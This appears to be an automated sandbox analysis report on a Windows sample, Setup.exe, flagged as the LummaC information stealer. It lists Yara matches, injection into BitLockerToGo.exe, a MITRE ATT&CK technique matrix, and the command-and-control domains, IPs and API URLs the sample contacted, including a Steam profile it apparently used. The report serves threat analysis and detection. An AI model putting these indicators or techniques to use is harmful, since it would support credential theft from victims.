                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Setup.exe.3e18000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3dc2000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3dc2000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3e18000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Setup.exe.3e18000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3dc2000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3dc2000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.3e18000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		311
                    Process Injection                    		1
                    Virtualization/Sandbox Evasion                    		OS Credential Dumping1
                    Security Software Discovery                    		Remote Services1
                    Screen Capture                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		311
                    Process Injection                    		LSASS Memory1
                    Virtualization/Sandbox Evasion                    		Remote Desktop Protocol1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Native API                    		Logon Script (Windows)Logon Script (Windows)11
                    Deobfuscate/Decode Files or Information                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares2
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell                    		Login HookLogin Hook3
                    Obfuscated Files or Information                    		NTDS1
                    Account Discovery                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets22
                    System Information Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Setup.exe19%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    condifendteu.sbs0%VirustotalBrowse
                    steamcommunity.com0%VirustotalBrowse
                    vennurviot.sbs17%VirustotalBrowse
                    drawwyobstacw.sbs0%VirustotalBrowse
                    sergei-esenin.com18%VirustotalBrowse
                    mathcucom.sbs20%VirustotalBrowse
                    resinedyw.sbs0%VirustotalBrowse
                    proclaimykn.buzz0%VirustotalBrowse
                    enlargkiw.sbs0%VirustotalBrowse
                    ehticsprocw.sbs0%VirustotalBrowse
                    allocatinow.sbs0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://player.vimeo.com0%URL Reputationsafe
                    https://player.vimeo.com0%URL Reputationsafe
                    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
                    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                    https://steam.tv/0%URL Reputationsafe
                    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://store.steampowered.com/points/shop/0%URL Reputationsafe
                    https://lv.queniujq.cn0%URL Reputationsafe
                    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                    https://checkout.steampowered.com/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                    https://store.steampowered.com/;0%URL Reputationsafe
                    https://store.steampowered.com/about/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                    https://help.steampowered.com/en/0%URL Reputationsafe
                    https://store.steampowered.com/news/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/0%URL Reputationsafe
                    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
                    https://store.steampowered.com/stats/0%URL Reputationsafe
                    https://medal.tv0%URL Reputationsafe
                    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
                    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                    https://mathcucom.sbs/k1%VirustotalBrowse
                    https://sergei-esenin.com/0%VirustotalBrowse
                    allocatinow.sbs0%VirustotalBrowse
                    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                    enlargkiw.sbs0%VirustotalBrowse
                    drawwyobstacw.sbs0%VirustotalBrowse
                    mathcucom.sbs20%VirustotalBrowse
                    https://www.youtube.com0%VirustotalBrowse
                    https://www.google.com0%VirustotalBrowse
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
                    https://vennurviot.sbs/api18%VirustotalBrowse
                    https://www.youtube.com/0%VirustotalBrowse
                    ehticsprocw.sbs0%VirustotalBrowse
                    https://sergei-esenin.com/r17%VirustotalBrowse
                    https://sketchfab.com0%VirustotalBrowse
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v0%VirustotalBrowse
                    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
                    https://sergei-esenin.com:443/api19%VirustotalBrowse
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    condifendteu.sbs
                    		104.21.79.35
                    		truetrueunknown
                    steamcommunity.com
                    		104.102.49.254
                    		truetrueunknown
                    vennurviot.sbs
                    		172.67.140.193
                    		truetrueunknown
                    drawwyobstacw.sbs
                    		188.114.97.3
                    		truetrueunknown
                    mathcucom.sbs
                    		188.114.96.3
                    		truetrueunknown
                    proclaimykn.buzz
                    		188.114.97.3
                    		truetrueunknown
                    sergei-esenin.com
                    		172.67.206.204
                    		truetrueunknown
                    ehticsprocw.sbs
                    		172.67.173.224
                    		truetrueunknown
                    resinedyw.sbs
                    		104.21.77.78
                    		truetrueunknown
                    enlargkiw.sbs
                    		104.21.33.249
                    		truetrueunknown
                    allocatinow.sbs
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    enlargkiw.sbstrueunknown
                    allocatinow.sbstrueunknown
                    drawwyobstacw.sbstrueunknown
                    mathcucom.sbstrueunknown
                    https://steamcommunity.com/profiles/76561199724331900true
                    • URL Reputation: malware
                    		unknown
                    https://vennurviot.sbs/apitrueunknown
                    ehticsprocw.sbstrueunknown
                    condifendteu.sbstrue
                      		unknown
                      https://resinedyw.sbs/apitrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://player.vimeo.comBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://mathcucom.sbs/kBitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://mathcucom.sbs/lBitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://community.akamai.steamstatic.com/public/javYBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://community.akamai.steamstatic.com/puNBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5fBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://resinedyw.sbs/kBitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://sergei-esenin.com/BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.youtube.comBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.comBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://s.ytimg.com;BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://store.steampBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://steam.tv/BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.cloudflare.com/learning/access-manag-sBitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://sketchfab.comBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmptrue
                                      • URL Reputation: malware
                                      		unknown
                                      https://www.youtube.com/BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.cloudflare.com/learning/access-managBitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016710572.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016726223.0000000000648000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://sergei-esenin.com/rBitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?vBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://sergei-esenin.com:443/apiBitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://mathcucom.sbs/BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.com/recaptcha/BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://checkout.steampowered.com/BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://sergei-esenin.com/UBitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://store.steampoBitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
